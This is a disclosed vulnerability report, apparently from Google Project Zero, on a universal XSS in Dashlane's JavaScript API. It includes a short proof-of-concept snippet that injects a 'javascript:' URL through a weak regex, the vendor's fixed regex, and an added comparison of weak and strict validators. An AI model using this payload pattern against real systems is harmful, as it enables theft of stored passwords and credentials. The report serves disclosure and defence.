Status: Fixed
Closed: Sep 2016
Dashlane: universal XSS in doOnboardingSiteStep API
Project Member Reported by taviso@google.com, Aug 11 2016
Browsing through the dashlane javascript API, doOnboardingSiteStep uses the regex /:\/\/(.[^\/]+)/ to validate the site parameter, but that also matches javascript:alert(1)//://whatever.

This results in a universal XSS, allowing any site to XSS any other site - and therefore access cookies and user data, steal passwords and credentials for any website, etc, etc. Something like this should work:

dashlaneAPI.init({});
window.open('https://mail.google.com'); // must be in a click event handler to disable popup blocker - can be any site
dashlaneAPI.global.isInstalled(function(err,
                                        isInstalled,
                                        communicationObject) {
 communicationObject.callAPI('getUserOnboardingSites', null, function () {});
 communicationObject.callAPI('doOnboardingSiteStep', {
     site: 'javascript:alert(1);//://twitter.com'
 }, function () {});
});

I'm going to list this as critical severity even though it's not a remote code execution, because the sole intent of the product is to protect website passwords and this effectively allows you to steal all passwords.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Project Member Comment 1 by taviso@google.com, Aug 11 2016
Here's an ugly demo; it's probably not reliable due to timing. You need the dashlane javascript api file, I just copied the minified version from dashlane.com.
Attachment: dashlane.html (984 bytes)
Project Member Comment 4 by taviso@google.com, Aug 11 2016
I looked at their fix, they now do:

var b = d.site.match(/^https?:\/\/([.-a-z0-9_^/]+)/i);

which seems good to me.
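As an added illustration of the report's point (not Dashlane's code and not the patch quoted above), the following contrasts the permissive regex from the original report with a strict allow-list check built on the WHATWG URL parser. Function and constant names (extractSiteHostWeak, extractSiteOriginStrict, SAMPLES) are this example's own, and the sample inputs are constructed.

```javascript
// Added example, not code from the Dashlane API or from the issue thread.
// Pattern quoted in the report: any "://" anywhere in the string matches, and
// the capture group is whatever follows it up to the next "/". The scheme
// in front of it is never checked, which is the whole bug.
const WEAK_SITE_RE = /:\/\/(.[^\/]+)/;

function extractSiteHostWeak(site) {
  const m = site.match(WEAK_SITE_RE);
  return m ? m[1] : null;
}

// Hardened replacement (assumed design, not Dashlane's fix): parse with the
// URL parser, accept only http(s), require a dotted hostname made of valid
// labels, reject embedded credentials, and hand back the normalised origin
// so callers never work with the raw attacker-controlled string.
const HOST_LABEL = '[a-z0-9](?:[a-z0-9-]*[a-z0-9])?';
const STRICT_HOST_RE = new RegExp(`^${HOST_LABEL}(?:\\.${HOST_LABEL})+$`);

function extractSiteOriginStrict(site) {
  let url;
  try {
    url = new URL(site);
  } catch (e) {
    return null; // unparseable input is rejected outright
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  if (!STRICT_HOST_RE.test(url.hostname)) return null; // URL lowercases it
  if (url.username || url.password) return null;
  return url.origin; // e.g. "https://twitter.com" (port kept if non-default)
}

// Constructed inputs: the payload shape from the report plus benign URLs.
const SAMPLES = [
  'javascript:alert(1);//://twitter.com',
  'https://twitter.com/login',
  'http://example.com:8080/',
  'data:text/html,x://host',
  'ftp://files.example.com/',
];

function classify(site) {
  return { weak: extractSiteHostWeak(site), strict: extractSiteOriginStrict(site) };
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  for (const s of SAMPLES) console.log(JSON.stringify(s), classify(s));
}
```

The weak check returns "twitter.com" for the javascript: payload exactly as it does for a real Twitter URL, while the strict check returns null for every non-http(s) scheme.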

Project Member Comment 6 by taviso@google.com, Sep 6 2016
Labels: -Restrict-View-Commit -Severity-High Severity-HIgh
Status: Fixed
The fixes are live now; it took so long because Apple reviews all updates to the App Store.